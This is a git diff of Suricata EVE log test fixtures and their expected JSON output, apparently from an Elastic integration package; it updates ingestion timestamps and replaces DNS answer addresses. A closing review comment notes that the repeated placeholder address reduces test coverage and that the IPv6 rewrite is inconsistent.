@@ -2041,7 +2041,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312711600Z", + "ingested": "2021-12-09T13:45:19.996735400Z", "original": "{\"timestamp\":\"2018-10-04T09:35:01.575088+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":9,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/multiverse\\/binary-amd64\\/by-hash\\/SHA256\\/8ab8cb220c0e50521c589acc2bc2b43a3121210f0b035a0605972bcffd73dd16\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":575,\"pkts_toclient\":1079,\"bytes_toserver\":40452,\"bytes_toclient\":1618380,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -2157,7 +2157,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-05T10:52:43.312715800Z", + "ingested": "2021-12-09T13:45:19.996740100Z", "original": "{\"tls\":{\"ja3s\":{\"string\":\"333,55555,66666-22\",\"hash\":\"0993626a07ad09e1ce91293be7aa5721\"},\"ja3\":{\"string\":\"001,22222-33333-00-44444-66666-333-333-55555-55555-22-55555-44444-22-33-66666-77777-22-88888-99999-333-22-66666-77777-22-99999-96611-22-33-88888-33333-88888-333-22222-33333-333-222-88888-444-99999-22222-666-777-888,22-33-44-55-6,77-88-99-0-11-11-22-33-44-55,0\",\"hash\":\"d92325c876e7279f4eb8c62415e3a6b7\"},\"notafter\":\"2024-07-16T14:52:35\",\"notbefore\":\"2019-07-17T14:52:35\",\"version\":\"TLS 1.2\",\"sni\":\"hostname.domain.net\",\"fingerprint\":\"00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33\",\"serial\":\"00:11:22:33:44:55:66:77:88\",\"issuerdn\":\"C=US, O=Google Inc, CN=Google Internet Authority G2\",\"subject\":\"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com\"},\"proto\":\"TCP\",\"dest_port\":9080,\"dest_ip\":\"10.232.0.237\",\"src_port\":45884,\"src_ip\":\"10.126.2.140\",\"event_type\":\"tls\",\"in_iface\":\"enp5s0\",\"flow_id\":1091813059495729,\"timestamp\":\"2018-10-04T09:35:02.796615+0000\"}", "category": [ "network" 
@@ -2284,7 +2284,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312719800Z", + "ingested": "2021-12-09T13:45:19.996745900Z", "original": "{\"flow\":{\"start\":\"2020-06-26T11:00:02.970011-0400\",\"bytes_toclient\":4660,\"bytes_toserver\":1074,\"pkts_toclient\":8,\"pkts_toserver\":7},\"app_proto\":\"tls\",\"tls\":{\"ja3s\":{\"string\":\"742,48172,30210-30\",\"hash\":\"391231ba5675e42807b9e1f457b2614e\"},\"ja3\":{\"string\":\"718,4682-2687-2686-41992-41911-53292-53297-41969-22905-41926-41924-94181-94711-15-23-95-12-11-205,0-33-50-53-6-61-39-23-34-85-81,93-04-52,3-9-3\",\"hash\":\"3f1ea03f5822e8021b60cc3e4b233181\"},\"notafter\":\"2026-06-25T17:36:29\",\"notbefore\":\"2016-06-27T17:36:29\",\"version\":\"TLS 1.2\",\"sni\":\"host.domain.net\",\"fingerprint\":\"36:3f:ee:2a:1c:fa:de:ad:be:ef:42:99:cf:a9:b0:91:01:eb:a9:cc\",\"serial\":\"72:A9:2C:51\",\"issuerdn\":\"C=Unknown, ST=Unknown, L=Unknown, O=Unknown, OU=Unknown, CN=Unknown\",\"subject\":\"C=Unknown, ST=Unknown, L=Unknown, O=Unknown, OU=Unknown, CN=Unknown\"},\"alert\":{\"severity\":3,\"category\":\"\",\"signature\":\"SURICATA TLS on unusual port\",\"rev\":1,\"signature_id\":2610003,\"gid\":1,\"action\":\"allowed\"},\"proto\":\"TCP\",\"dest_port\":8443,\"dest_ip\":\"10.128.2.48\",\"src_port\":64389,\"src_ip\":\"10.137.3.54\",\"event_type\":\"alert\",\"in_iface\":\"enp0s31f6\",\"flow_id\":991192778198299,\"timestamp\":\"2020-06-26T11:00:03.342282-0400\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log index 4f625ae98f8..9f38719e12d 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log 
@@ -1,24 +1,24 @@ {"timestamp":"2019-08-22T23:48:27.924120+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":46686,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51803,"rrname":"google.com","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-22T23:48:27.924282+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":36993,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39523,"rrname":"google.com","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-22T23:48:27.950946+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":36993,"proto":"UDP","dns":{"version":2,"type":"answer","id":39523,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"AAAA","answers":[{"rrname":"google.com","rrtype":"AAAA","ttl":272,"rdata":"2607:f8b0:4006:0805:0000:0000:0000:200e"}],"grouped":{"AAAA":["2607:f8b0:4006:0805:0000:0000:0000:200e"]}}} -{"timestamp":"2019-08-22T23:48:27.957906+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":46686,"proto":"UDP","dns":{"version":2,"type":"answer","id":51803,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"A","answers":[{"rrname":"google.com","rrtype":"A","ttl":299,"rdata":"172.217.11.46"}],"grouped":{"A":["172.217.11.46"]}}} 
+{"timestamp":"2019-08-22T23:48:27.950946+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":36993,"proto":"UDP","dns":{"version":2,"type":"answer","id":39523,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"AAAA","answers":[{"rrname":"google.com","rrtype":"AAAA","ttl":272,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}],"grouped":{"AAAA":["2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"]}}} +{"timestamp":"2019-08-22T23:48:27.957906+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":46686,"proto":"UDP","dns":{"version":2,"type":"answer","id":51803,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"A","answers":[{"rrname":"google.com","rrtype":"A","ttl":299,"rdata":"175.16.199.1"}],"grouped":{"A":["175.16.199.1"]}}} {"timestamp":"2019-08-22T23:48:48.839495+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":50720,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60273,"rrname":"www.elastic.co","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-22T23:48:48.839714+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":41979,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4210,"rrname":"www.elastic.co","rrtype":"AAAA","tx_id":0}} 
-{"timestamp":"2019-08-22T23:48:48.901548+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":50720,"proto":"UDP","dns":{"version":2,"type":"answer","id":60273,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":270,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.130.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.194.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.2.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.66.217"}],"grouped":{"A":["151.101.130.217","151.101.194.217","151.101.2.217","151.101.66.217"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} -{"timestamp":"2019-08-22T23:48:48.902685+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":41979,"proto":"UDP","dns":{"version":2,"type":"answer","id":4210,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":299,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0600:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0000:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"}],"grouped":{"AAAA":["2a04:4e42:0600
:0000:0000:0000:0000:0729","2a04:4e42:0000:0000:0000:0000:0000:0729","2a04:4e42:0200:0000:0000:0000:0000:0729","2a04:4e42:0400:0000:0000:0000:0000:0729"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} +{"timestamp":"2019-08-22T23:48:48.901548+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":50720,"proto":"UDP","dns":{"version":2,"type":"answer","id":60273,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":270,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"}],"grouped":{"A":["175.16.199.1","175.16.199.1","175.16.199.1","175.16.199.1"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} 
+{"timestamp":"2019-08-22T23:48:48.902685+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":41979,"proto":"UDP","dns":{"version":2,"type":"answer","id":4210,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":299,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"}],"grouped":{"AAAA":["2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","2a04:4e42:0200:0000:0000:0000:0000:0729","2a04:4e42:0400:0000:0000:0000:0000:0729"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} {"timestamp":"2019-08-23T01:22:31.812655+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":44773,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28329,"rrname":"www.yahoo.com","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-23T01:22:31.812828+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":55246,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7050,"rrname":"www.yahoo.com","rrtype":"AAAA","tx_id":0}} 
{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.yahoo.com","rrtype":"CNAME","ttl":1315,"rdata":"atsv2-fp-shed.wg1.b.yahoo.com"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"98.138.219.232"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"98.138.219.231"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"72.30.35.10"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"72.30.35.9"}} 
+{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} {"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.yahoo.com","rrtype":"CNAME","ttl":1268,"rdata":"atsv2-fp-shed.wg1.b.yahoo.com"}} 
-{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0058:1836:0000:0000:0000:0010"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0044:041d:0000:0000:0000:0003"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0058:1836:0000:0000:0000:0011"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0044:041d:0000:0000:0000:0004"}} 
+{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} {"timestamp":"2019-08-23T02:03:36.578089+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":48288,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9104,"rrname":"www.elastic.co","rrtype":"A","tx_id":0}} 
{"timestamp":"2019-08-23T02:03:36.578262+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":59203,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12859,"rrname":"www.elastic.co","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-23T02:03:36.619381+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":48288,"proto":"UDP","dns":{"version":2,"type":"answer","id":9104,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":150,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.194.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.2.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.66.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.130.217"}]}} 
-{"timestamp":"2019-08-23T02:03:36.626559+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":59203,"proto":"UDP","dns":{"version":2,"type":"answer","id":12859,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":269,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0000:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0600:0000:0000:0000:0000:0729"}]}} +{"timestamp":"2019-08-23T02:03:36.619381+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":48288,"proto":"UDP","dns":{"version":2,"type":"answer","id":9104,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":150,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"}]}} 
+{"timestamp":"2019-08-23T02:03:36.626559+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":59203,"proto":"UDP","dns":{"version":2,"type":"answer","id":12859,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":269,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}]}} diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json index a0fdf41a97d..549717e5874 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json @@ -51,7 +51,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853363600Z", + "ingested": "2021-12-09T13:45:26.597818200Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.924120+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":46686,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":51803,\"rrname\":\"google.com\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" 
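Review bot: The rewritten A answers for `dualstack.r2.shared.global.fastly.net` and `atsv2-fp-shed.wg1.b.yahoo.com` now repeat one address four times, so the fixture no longer exercises a multi-address answer; the regenerated expected output shows `dns.resolved_ip` holding four copies of `175.16.199.1` while `related.ip` collapses to a single entry, which is a loss of coverage rather than a check of behavior. If the supported subset is a range rather than a single address, distinct values such as `175.16.199.1` through `175.16.199.4` would preserve the original shape of these answers; if only the one address is supported, a sentence in the PR description saying the duplication is deliberate would stop the next reader from treating it as a copy-paste slip. The AAAA rewrite is also only partial: in each four-answer response the `2a04:4e42:0000::`/`:0600::` records became `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` while `2a04:4e42:0200::`/`:0400::` were left as they were, so either those two are inside the supported set (and the other two did not need replacing) or they still need the same treatment. The same two-of-four pattern appears in the `23:48:48` and `02:03:36` AAAA responses, so this looks systematic rather than accidental, but the intent is not stated anywhere in the diff.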
